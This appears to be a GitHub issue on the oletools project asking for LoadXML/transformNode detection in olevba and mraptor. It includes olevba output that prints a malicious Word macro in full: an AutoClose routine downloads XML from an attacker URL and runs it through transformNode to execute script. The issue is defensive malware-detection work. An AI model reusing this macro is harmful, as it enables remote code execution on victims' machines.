oletools icon indicating copy to clipboard operation
oletools copied to clipboard

Published 20 hours ago verified publisher icon decalage2

olevba, mraptor: add keywords LoadXML/transformNode for XSL to script

Open decalage2 opened this issue 1 year ago • 1 comments
trafficstars

Several recent samples use LoadXML and transformNode methods (on a MSXML2.DomDocument COM object) to apply an XSL stylesheet to XML data and obtain a malicious JavaScript which seems to be executed automatically:

  • https://twitter.com/DmitriyMelikov/status/1772661332904468851
  • https://twitter.com/doc_guard/status/1772602672702497039

transformNode: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms761399(v=vs.85)

more info:

  • https://twitter.com/blu3_team/status/1046066227926499328
  • https://twitter.com/domchell/status/1038173734732029952
  • https://twitter.com/EmericNasi/status/1254478745634770945
  • https://twitter.com/bohops/status/1254559511148474369
$ olevba bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc 
olevba 0.60.1 on Python 3.11.6 - http://decalage.info/python/oletools
===============================================================================
FILE: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub AUtoclose()
Set Document = CreateObject("MSXML2.DomDocument")
Set dOcuMeNtXMl = CreateObject("MSXML2.xmlhttp")
Document.async = 0
With dOcuMeNtXMl
.Open "get", "https://adfhjiuyqnmahdfiuad.com/index.php", False
.senD
End With
Document.LoadXML dOcuMeNtXMl.responseText
Document.tRAnsformnode Document
End Sub
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AUtoclose           |Runs when the Word document is closed        |
|Suspicious|Open                |May open a file                              |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|MSXML2.xmlhttp      |May download files from the Internet         |
|IOC       |https://adfhjiuyqnma|URL                                          |
|          |hdfiuad.com/index.ph|                                             |
|          |p                   |                                             |
+----------+--------------------+---------------------------------------------+

decalage2 avatar Mar 27 '24 11:03 decalage2